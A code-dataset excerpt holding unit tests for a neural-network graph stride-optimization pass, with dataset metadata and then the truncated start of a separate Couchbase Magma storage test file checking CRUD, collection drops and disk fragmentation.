'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_2_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_2_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_2_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_3': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_3_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_3_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_3_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_4': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_4_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_4_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_4_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_5': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_5_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_5_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_5_data': {'value': None, 'shape': None, 'kind': 'data'},
# ReLU
'relu_1': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
'relu_1_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
'relu_2': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
'relu_2_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
'relu_3': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
'relu_3_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
# Pooling
'pool_1': {'type': 'Pooling', 'kind': 'op', 'op': 'Pooling',
'spatial_dims': np.array([2, 3]),
'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'infer': Pooling.infer},
'pool_1_data': {'value': None, 'shape': None, 'kind': 'data'},
}
# In description of unit tests below will be used next syntax: Operation(NxM,XxY), where NxM - kernel size, XxY - stride
class ResnetOptimizationTests(unittest.TestCase):
# Pl->Conv(1x1,1x1)->Conv(1x1,2x2) => Pl->Conv(1x1,2x2)->Conv(1x1,1x1)
def test_resnet_optimization_1(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl->Conv(3x3,2x2)->Conv(1x1,2x2) => Pl->Conv(3x3,4x4)->Conv(1x1,1x1)
def test_resnet_optimization_2(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 4, 4]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 56, 56])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl->Conv(3x3,2x2)->Conv(3x3,2x2) => Same
def test_resnet_optimization_3(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl--->Conv(3x3,2x2)->ReLU--->Eltwise-->Conv(1x1,2x2) => Pl--->Conv(3x3,4x4)->ReLU--->Eltwise-->Conv(1x1,1x1)
# `-->Conv(3x3,2x2)->ReLU---` `-->Conv(3x3,4x4)->ReLU---`
def test_resnet_optimization_4(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'relu_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
'relu_2_data': {'shape': np.array([1, 3, 112, 112])},
'eltwise_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_3_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 4, 4]),
'output': np.array([3])},
'conv_1_data': {'shape': np.array([1, 3, 56, 56])},
'relu_1_data': {'shape': np.array([1, 3, 56, 56])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 4, 4]),
'output': np.array([3])},
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
'relu_2_data': {'shape': np.array([1, 3, 56, 56])},
'eltwise_1_data': {'shape': np.array([1, 3, 56, 56])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_3_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
# dump_graph_for_graphviz(graph)
# dump_graph_for_graphviz(graph_ref)
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_3_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl--->Conv(1x1,1x1)->ReLU--->Eltwise-->Conv(1x1,2x2) => Pl--->Conv(1x1,2x2)->ReLU--->Eltwise-->Conv(1x1,1x1)
# `----------------->ReLU---` `-->Pool(1x1,2x2)->ReLU---`
def test_resnet_optimization_5(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
'relu_1_data': {'shape': np.array([1, 3, 224, 224])},
'relu_2_data': {'shape': np.array([1, 3, 224, 224])},
'eltwise_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_3_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'pool_1'),
('pool_1', 'pool_1_data'),
('pool_1_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3])},
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'relu_1_data': {'shape': np.array([1, 3, 112, 112])},
'pool_1': {'stride': np.array([1, 1, 2, 2])},
'pool_1_data': {'shape': np.array([1, 3, 112, 112])},
'relu_2_data': {'shape': np.array([1, 3, 112, 112])},
'eltwise_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_3_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
# dump_graph_for_graphviz(graph)
# dump_graph_for_graphviz(graph_ref)
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_3_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl->Conv(1x1,1x1)->Conv(1x1,2x2)->Conv(3x3,1x1)->Conv(1x1,2x2)
# =>
# Pl->Conv(1x1,2x2)->Conv(1x1,1x1)->Conv(3x3,2x2)->Conv(1x1,1x1)
def test_resnet_optimization_6(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
('conv_3_data', 'conv_4'),
('conv_4_w', 'conv_4'),
('conv_4_b', 'conv_4'),
('conv_4', 'conv_4_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_3': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_3_data': {'shape': np.array([1, 3, 110, 110])},
'conv_4_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_4': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_4_data': {'shape': np.array([1, 3, 55, 55])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
('conv_3_data', 'conv_4'),
('conv_4_w', 'conv_4'),
('conv_4_b', 'conv_4'),
('conv_4', 'conv_4_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3])},
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_3': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3])},
'conv_3_data': {'shape': np.array([1, 3, 55, 55])},
'conv_4_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_4': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_4_data': {'shape': np.array([1, 3, 55, 55])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_4_data', check_op_attrs=True)
self.assertTrue(flag, resp)
| 56.344882
| 120
| 0.384276
| 3,765
| 35,779
| 3.374768
| 0.037716
| 0.114592
| 0.073036
| 0.039666
| 0.925153
| 0.91807
| 0.909806
| 0.896584
| 0.858177
| 0.850386
| 0
| 0.07912
| 0.441153
| 35,779
| 634
| 121
| 56.433754
| 0.556339
| 0.031219
| 0
| 0.843137
| 0
| 0
| 0.225411
| 0.006207
| 0
| 0
| 0
| 0
| 0.011765
| 1
| 0.011765
| false
| 0.001961
| 0.017647
| 0
| 0.031373
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbd2bf2c66c1b2d69f4ee0636c49b8d4c5b451df
| 14,077
|
py
|
Python
|
pytests/storage/magma/magma_basic_crud.py
|
ashwin2002/TAF
|
4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
pytests/storage/magma/magma_basic_crud.py
|
ashwin2002/TAF
|
4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
pytests/storage/magma/magma_basic_crud.py
|
ashwin2002/TAF
|
4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
from Cb_constants.CBServer import CbServer
from couchbase_helper.documentgenerator import doc_generator
from magma_base import MagmaBaseTest
class BasicCrudTests(MagmaBaseTest):
def setUp(self):
super(BasicCrudTests, self).setUp()
self.change_swap_space(self.cluster.nodes_in_cluster)
self.generate_docs(doc_ops="update:read:delete")
self.items = self.num_items
def tearDown(self):
super(BasicCrudTests, self).tearDown()
def test_MB_38315(self):
self.log.info("Deleting half of the items")
self.doc_ops = "delete"
self.generate_docs(doc_ops=self.doc_ops,
delete_start=0, delete_end=self.num_items/2)
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions)
self.log.info("Verifying doc counts after create doc_ops")
self.bucket_util._wait_for_stats_all_buckets()
self.bucket_util.verify_stats_all_buckets(self.num_items)
tasks_info = self.bucket_util._async_validate_docs(
self.cluster, self.gen_delete, "delete", 0,
batch_size=self.batch_size,
process_concurrency=self.process_concurrency,
timeout_secs=self.sdk_timeout,
retry_exceptions=self.retry_exceptions,
ignore_exceptions=self.ignore_exceptions)
for task in tasks_info:
self.task_manager.get_task_result(task)
def test_drop_collections_after_upserts(self):
"""
Test will check space
Amplification after collection drop
!) Create multiple collections
2) Load docs in all collections
3) Drop a collections
4)Verify space amplification
"""
scope_name = CbServer.default_scope
collection_prefix = "FunctionCollection"
# # # # Non Default Scope creation # # # #
if self.num_scopes > 1:
scope_name = "FunctionScope"
self.bucket_util.create_scope(self.cluster.master,
self.buckets[0],
{"name": scope_name})
# # # # Collections Creation # # # #
for i in range(self.num_collections):
collection_name = collection_prefix + str(i)
self.log.info("Creating scope::collection {} {}\
".format(scope_name, collection_name))
self.bucket_util.create_collection(
self.cluster.master, self.buckets[0],
scope_name, {"name": collection_name})
self.sleep(2)
collections = self.buckets[0].scopes[scope_name].collections.keys()
if self.num_collections > 1 and scope_name is CbServer.default_scope:
collections.remove(CbServer.default_collection)
self.log.info("List of collections {}".format(collections))
# # # # DOC LOADING # # # #
end = 0
init_items = self.num_items
tasks_info = dict()
self.doc_ops = "create"
for collection in collections:
start = end
end += init_items
self.gen_create = doc_generator(
self.key, start, end,
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=self.target_vbucket,
vbuckets=self.cluster_util.vbuckets,
key_size=self.key_size,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size,
deep_copy=self.deep_copy)
tem_tasks_info = self.loadgen_docs(
self.retry_exceptions,
self.ignore_exceptions,
scope=scope_name,
collection=collection,
_sync=False)
tasks_info.update(tem_tasks_info.items())
self.num_items -= init_items
for task in tasks_info:
self.task_manager.get_task_result(task)
self.bucket_util.verify_doc_op_task_exceptions(
tasks_info, self.cluster)
self.bucket_util.log_doc_ops_task_failures(tasks_info)
self.log.info("Verifying num_items counts after doc_ops")
self.bucket_util._wait_for_stats_all_buckets()
self.bucket_util.verify_stats_all_buckets(self.num_items)
# # # # Initial Disk Usage # # # #
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
self.disk_usage[self.buckets[0].name] = disk_usage[0]
self.log.info(
"For bucket {} disk usage after initial '\n' \
creation is {}MB".format(
self.buckets[0].name,
self.disk_usage[self.buckets[0].name]))
# # # # Update docs in a single collection # # # #
count = 0
mutated = 1
self.doc_ops = "update"
self.log.info("Docs to be updated in collection {}\
".format(collections[-1]))
while count < self.test_itr:
self.gen_update = doc_generator(
self.key, start, end,
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=self.target_vbucket,
vbuckets=self.cluster_util.vbuckets,
key_size=self.key_size,
mutate=mutated,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size,
deep_copy=self.deep_copy)
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
scope=scope_name,
collection=collections[-1],
_sync=True)
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets()
count += 1
# # # # Drop a collection # # # #
self.log.info("Collection to be dropped {}\
".format(collections[0]))
self.bucket_util.drop_collection(
self.cluster.master, self.buckets[0],
scope_name=scope_name,
collection_name=collections[0])
self.buckets[0].scopes[scope_name].collections.pop(collections[0])
collections.remove(collections[0])
# # # # Space Amplification check # # # #
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.assertIs(
_res > 2.5 * self.disk_usage[
self.disk_usage.keys()[0]],
False, "Disk Usage {}MB '\n' \
exceeds Actual'\n' \
disk usage {}MB by 2.5'\n' \
times".format(
_res,
